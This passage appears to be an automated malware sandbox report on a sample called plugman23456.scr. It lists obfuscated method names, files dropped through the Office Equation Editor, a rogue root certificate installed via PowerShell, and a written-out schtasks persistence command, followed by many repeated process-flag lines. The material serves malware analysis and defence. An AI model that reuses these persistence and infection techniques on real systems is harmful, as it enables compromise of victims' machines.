                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, ot7ccRIYfCGBeI1Nt4.csHigh entropy of concatenated method names: 'I9kjfTS8Xx', 'lwjj9w04Sm', 'FWRjkIbkRX', 'PTxkaJQD8J', 'Km6kzeqd0l', 'UOojQg6Ve4', 'i7OjW1pxjC', 'b0WjCJqjab', 'L5bj65aWBm', 'mhJjJS3Imo'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, TfG9VpJWTGHvDMAOW4.csHigh entropy of concatenated method names: 'YpRWjVPP59', 'og7WnrK6ZW', 'wkwWpDkSYM', 'JtdWo6aRkg', 'ptWW0vEbCL', 'HXKWUwALbq', 'SyGdN4oX9VAoaRmADl', 'K4q2eu4bVFhxOAbFw4', 'zJvWWjpQ56', 'WD9W61XbPE'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, C9ZsP4lLVd0D38e7iF.csHigh entropy of concatenated method names: 'ToString', 'WDEU1wLqk3', 'HHEUdnCIRm', 'qJDUDKOY6F', 'mDSUM7sM6E', 'Ai8UXBHrbM', 'dIJUEQhHyE', 'McGUIpvb6O', 'gXRUcHSxwT', 'ucbU5P1MYa'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, WiwhDEOeobox14JLf2.csHigh entropy of concatenated method names: 'QW0yBfccu6', 'B4Sya7iGUa', 'iJZGQfT9D8', 'HE3GWR46Ka', 'V05y1IibIJ', 'Khoy3flCdB', 'gGTyKVU5EZ', 'MBjyAVjeQ4', 'N4wy4hJVax', 'OUjylidDyA'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, fCsRxAWQlGZ1RtPLE5a.csHigh entropy of concatenated method names: 'j4SH8ei9ae', 'LSWHq1gOA3', 'vPVHrie5qh', 'cxQHSWHhQm', 'JsQHN1Vjc1', 'Nl2HYLN9ox', 'u5MHvf5PBP', 'fOMHxfnyY8', 'lNZHiZHAXZ', 'zqRHLSnaWy'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, npLGRyAU4LiV4BYMRm.csHigh entropy of concatenated method names: 'EcP0FOtUmJ', 'ACc03KItT3', 'ubN0AN8g5R', 'FMx04Zous4', 'zjR0dHBMrw', 'MhS0DJxAC8', 'qT20MYyqDJ', 'f800XOmME2', 'Oss0EVfh8s', 'vO40Ihavxn'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, VwD1A4Krg6ay80AAUQ.csHigh entropy of concatenated method names: 'qbZVxjSrcO', 'w07ViddbQE', 'JbGVTLemUj', 'gkyVd77AmV', 'NAsVMQxdmn', 'jgHVXtK9rO', 'tncVIhU4PQ', 'IQvVc1Kj8p', 'fVCVF0xIWc', 'Ax0V1yLvNU'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, YRkgxaL7fs19wUtWvE.csHigh entropy of concatenated method names: 'felZN1DGWV', 'bM7Zv1sqCb', 'gAr9DoQKIu', 'UJE9Mv6Kne', 'mKS9XbFkYU', 'LYS9EBAffH', 'uj39IaNKPp', 'Kv09cfOhfr', 'FG5956HejZ', 'IFQ9F7DEmL'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, lWFL1Zax9sOlYCjl2P.csHigh entropy of concatenated method names: 'DdpHWTbDRO', 'KRBH6h2vdJ', 'zXUHJQrVqf', 'mbbHfYYLy9', 'xANHRRDxw6', 'MUoHZ5iLSh', 'WWaHk1lj6k', 'O0RG7UYSnU', 'pTcGBqm2pL', 'ufIG2Xg9S6'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, MiBZoGzXoBWkGomNiG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'muYHVTUo6Z', 'p88H0Zhxp3', 'lT7HUyeWvQ', 'zogHyLOKrn', 'TK7HGKkwA5', 'Rh7HHC5oVW', 'IjJHPEkm2i'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, PnUTpiW6WXJMEpReP0D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MB6PAaKGyY', 'nvcP4FhPis', 'zRRPlEnNtP', 'Q6dPtSmEwS', 'XdVPbWMdS6', 'iwfPOLOEV0', 'uFLP7IIQXi'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, l2l1amikwDkSYMXtd6.csHigh entropy of concatenated method names: 'lI29S99lQ7', 'BNi9Ys1CuM', 'Hgt9xZcCnu', 'XB39iTbVIt', 'CAY90IF9lq', 'xpi9UFIu4H', 'rAL9ynlF30', 'Qjt9GIswhG', 'f1S9HckxLr', 'CFW9P57PY4'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kQAisy255KPRYZ0AXG.csHigh entropy of concatenated method names: 'P4IGToaCJd', 'GueGdNPvTn', 'DHsGDrF35t', 'VaDGMP8Lgi', 'AEpGA3o8aE', 'e5EGXFr1uc', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, MXbKB5RaqyYt1WWwDP.csHigh entropy of concatenated method names: 'Dispose', 'PTEW2NSV7A', 'TiHCdBEVPr', 'HcDqqfoK8s', 'WbhWa7CyXr', 'Qx7WzCHZBl', 'ProcessDialogKey', 'gHnCQQAisy', 'N5KCWPRYZ0', 'QXGCCgWFL1'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, QgxhOK5sxigKaKcO6j.csHigh entropy of concatenated method names: 'cG2j8eubCD', 'LedjqDoLR1', 'q4tjrFlSQD', 'RyijS8mdUF', 'QHyjN543vd', 'Gx8jY4C19u', 'GD8jvZxWcA', 'i19jxE001t', 'FjIjiMlDPT', 'SQFjLomEgB'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, tCvJFyCJaxowbDKX1A.csHigh entropy of concatenated method names: 'WuyrCR4ii', 'r3VSjpeMF', 'tN8YPqYSd', 'tIgvnJRrK', 'O5Gi1aOSO', 'D84LjCe3k', 'LG6YTMAcligSBlsVSp', 'bkgEXnhhq1ElD9pE2c', 'XdLGjx18M', 'sLmPaacGU'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kiGuuLnuA0qaZ9jFQW.csHigh entropy of concatenated method names: 'sjP6siki0O', 'UlC6fKZmgk', 'Nj36R1ZHHC', 'n9H69Meg9Z', 'Voj6ZscI9o', 'Kok6kqO1mq', 'AsR6jApGAj', 'S4D6nXSNtD', 'pNM6gjcPtm', 'oof6pxaZNP'

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scrJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\plugman23456.scrJump to dropped file
                  Installs new ROOT certificates
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00406EB0 ShellExecuteW,URLDownloadToFileW,25_2_00406EB0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scrJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\plugman23456.scrJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,25_2_0041AA4A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,22_2_004047CB
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
